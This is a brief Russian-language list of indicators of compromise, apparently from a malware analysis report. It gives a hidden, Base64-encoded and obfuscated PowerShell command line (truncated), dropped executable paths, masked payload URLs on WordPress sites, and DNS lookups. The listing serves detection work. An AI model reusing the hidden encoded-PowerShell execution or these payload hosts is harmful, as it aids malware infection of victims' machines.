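Техническая информация
(Символы `#` в доменных именах ниже — маскировка, выполненная источником: в таком виде эти значения не годятся для точного сопоставления с журналами DNS и прокси.)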
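- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -windowstyle hidden -ENCOD IAAgAFMARQB0AC0AaQBUAEUATQAgAHYAQQBSAEkAQQBiAEwAZQA6ADIAUgBGACAAKABbAHQAWQBwAEUAXQAoACIAewA0AH0AewA1AH0AewAyAH0AewAwAH0AewAxAH0AewAzAH0AIgAtAGYAJwAuAG...
  (`-ENCOD` — сокращённая запись параметра `-EncodedCommand`; его значение — Base64 от строки в кодировке UTF-16LE, здесь оно обрезано. Видимый фрагмент декодируется в начало обфусцированного скрипта: `SEt-iTEM vARIAbLe:2RF ([tYpE]("{4}{5}{2}{0}{1}{3}"-f'.`. Правила обнаружения по командной строке должны учитывать сокращённые формы параметра, а не только полное имя `-EncodedCommand`.)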
- %HOMEPATH%\ho81uzi\fmthkts\fertmt9.exe
- %HOMEPATH%\ho81uzi\fmthkts\fertmt9.exe
- %HOMEPATH%\ho81uzi\fmthkts\fertmt9.exe
- http://fo####llstep.com/cgi-bin/A/
- http://fo####llstep.com/cgi-sys/suspendedpage.cgi
- http://do###arim.com/wp-admin/AYO/
- http://se####ekifix.com/wp-admin/nBJ/
- http://di######ienne-tiffany.com/wp-includes/p/
- DNS ASK fo####llstep.com
- DNS ASK na######aterresources.com
- DNS ASK do###arim.com
- DNS ASK se####ekifix.com
- DNS ASK di######ienne-tiffany.com
- DNS ASK mo###aree.com
- DNS ASK mo####autoloan.com